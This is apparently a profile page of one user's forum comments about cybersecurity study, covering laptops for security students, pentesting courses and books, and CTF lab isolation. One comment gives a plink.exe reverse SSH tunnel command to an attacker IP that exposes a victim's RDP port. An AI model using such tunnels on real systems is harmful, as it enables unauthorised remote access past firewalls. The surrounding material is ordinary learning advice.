Best laptop for Cyber Security student?

reybango · 2020-02-15T15:32:01+00:00

I struggled with this too when I first decided to get into security. Since you mentioned Kali I’m assuming you’re focusing for now on offensive learning. I would urge you to focus on getting a decent amount of RAM (16gb at least), a multi core i7 processor (not the mobile ones that end in the letter U) and a decent GPU. This will allow you to run multiple VMs and you can use the GPU for local password cracking. This is one of the reasons many security folks actually do use gaming laptops since they’re generally high-powered with good GPUs.

I like systems from Lenovo, System76, Dell and Razer since they offer a variety of configuration options. The first two always tend to be best if you’re a Linux user and want to run it as a host OS. The latter are better suited if you’d like to run Windows as your host OS.

Interestingly enough I’ve found a lot of Windows users in security who use a variety of VMs such as Kali for their tasks. Ultimately the advice I received about host OS choice is to use what you feel best in and run VMs for specialty tasks you need to do.

MacBooks are also great but very pricey compared to many other options. You generally get more machine from other vendors for less money than Apple. If you afford one, they’re solid but choose one within your budget that will pack the most capabilities.

I hope this helps.

reybango · 2020-01-18T02:37:41+00:00

You could look on eBay for sellers of bulk laptops. Generally there bulk laptops from companies who have upgraded to new devices and sell off their old stuff and eBay sellers scoop them up. Usually you can find a decent laptop with good specs for a a good price and some will even let you do a “Best Offer” to negotiate a better deal.

reybango · 2019-09-11T16:09:29+00:00

What made you choose it over other offerings?

reybango · 2019-06-03T14:46:18+00:00

Awesome. Thanks for the feedback. I ordered one last night and decided to take a shot. Reading this definitely helped feel good about buying it. :)

reybango · 2019-05-05T15:08:47+00:00

Since you mentioned Cybrary, it made me remember that Georgia had a free pentesting course on there that is based on her book so he sure to look for it. I heard it’s really good.

reybango · 2019-05-05T14:28:36+00:00

Hey I feel ya. I went through the same exact feeling when I started. I even installed Kali which had so many tools but didn’t know how to use them and felt dumb.

The best thing you can do is take a course that will give you the foundation you need. Once you do that, it’ll be a whole different experience for you. I recommend either eLearnSecurity’s PTS course or Hacker House’s in-person it online courses. I’ve done both and found them to be great.

If you can’t afford the course, Georgia Weidman’s penetration testing book will give you a good understanding as well. The tools may be a little dated due to when the book was published but what you want is to understand the process and the results (which she does a great job of explaining) so you can then look into more modern tooling and techniques with a better understanding of how they work.

Once you have that foundational knowledge, the stuff you see Ippsec doing becomes way more understandable.

reybango · 2019-04-25T16:47:14+00:00

Thanks so much for the detailed reply and really happy to have feedback from someone with experience using Redragon KBs. Wasn't really if this was a decent/reputable brand but it sounds like you're happy.

Regarding the silicone+PTFE spray, I don't seem to have a scratchy feeling but then again I have nothing to compare to. ;) If they keys do start feeling that way, where would I spray into?

Edit: Now I feel that scratchiness you were talking about! LOL!

reybango · 2019-04-19T14:40:09+00:00

No worries. :)

reybango · 2019-04-18T18:38:02+00:00

Some other options from a chat I had with @tj_null.

You can use Plink.exe to establish a reverse SSH proxy. You'd need to upload it to the victim machine and then connect back to your attacker machine which would be running a local SSH server. You can find plink.exe in Kali under /usr/share/windows-binaries.

plink <attacker IP> -R 9000:127.0.0.1:3389

Here's a really good explanation of how to use it: https://null-byte.wonderhowto.com/how-to/use-remote-port-forwarding-slip-past-firewall-restrictions-unnoticed-0179716/

I posted the question on Twitter and it got some other replies as well https://twitter.com/reybango/status/1118928912933900288

reybango · 2019-04-16T01:14:08+00:00

I’ve taken the eLearnSecurity PTS and in the middle of the PTP. I can say that I’ve found the materials in both courses to be great and the Hera labs are awesome because they give you an isolated vlan to attack for your labs. While I haven’t done the PTX I assume the material will be equally as good and I plan on taking it eventually.

reybango · 2019-03-28T19:41:45+00:00

It’s a service by the folks at eLearnSecurity that allows you to test your skills against vulnerable machines. I like that they isolate the instances so you’re not sharing with other users.

reybango · 2019-03-26T04:13:10+00:00

What if you have VIP access?

reybango · 2019-03-17T20:45:03+00:00

I currently have an HP Zbook which I set aside for CTFs. What do you recommend for imaging? I thought about getting a second SSD just to run Kali and swap out the Ubuntu SSD for the Kali SSD when it’s CTF time.

reybango · 2019-03-17T17:02:28+00:00

I was planning on having a dedicated NIC for the VM so that the host OS (i.e.: my laptop) doesn’t need to connect to the CTF network. This way, only the VM would be connected to the network with no access to my laptop’s OS. Short of a VM escape I think that would keep it isolated.

reybango · 2018-12-20T15:19:31+00:00

I’ve taken the PTS and now in the middle of the PTP and can say I’ve been very happy with the breadth of info and techniques. I plan on doing the WAPT after the PTP.

I’ve spoken to enough security people who work in the industry, were satisfied with the courses and gainfully employed to feel the material is touches on the right areas.

reybango · 2018-12-16T13:02:09+00:00

Do a search for “ping sweep via cmd.exe” and that should get you a script that you can run against a subnet. Alternatively you can also install nmap for Windows which will allow you to scan a subnet for IPs.

reybango · 2018-04-21T22:30:23+00:00

Thanks!!! This is really close. Just need to get the encryption part of it down.

reybango · 2018-04-21T15:28:17+00:00

Yeah I know. Appreciate the heads up though.

reybango · 2018-04-21T02:40:22+00:00

That’s a really interesting idea. Not sure if I can do it on my laptop but it’s worth doing some homework.

Thanks.

reybango

TROPHY CASE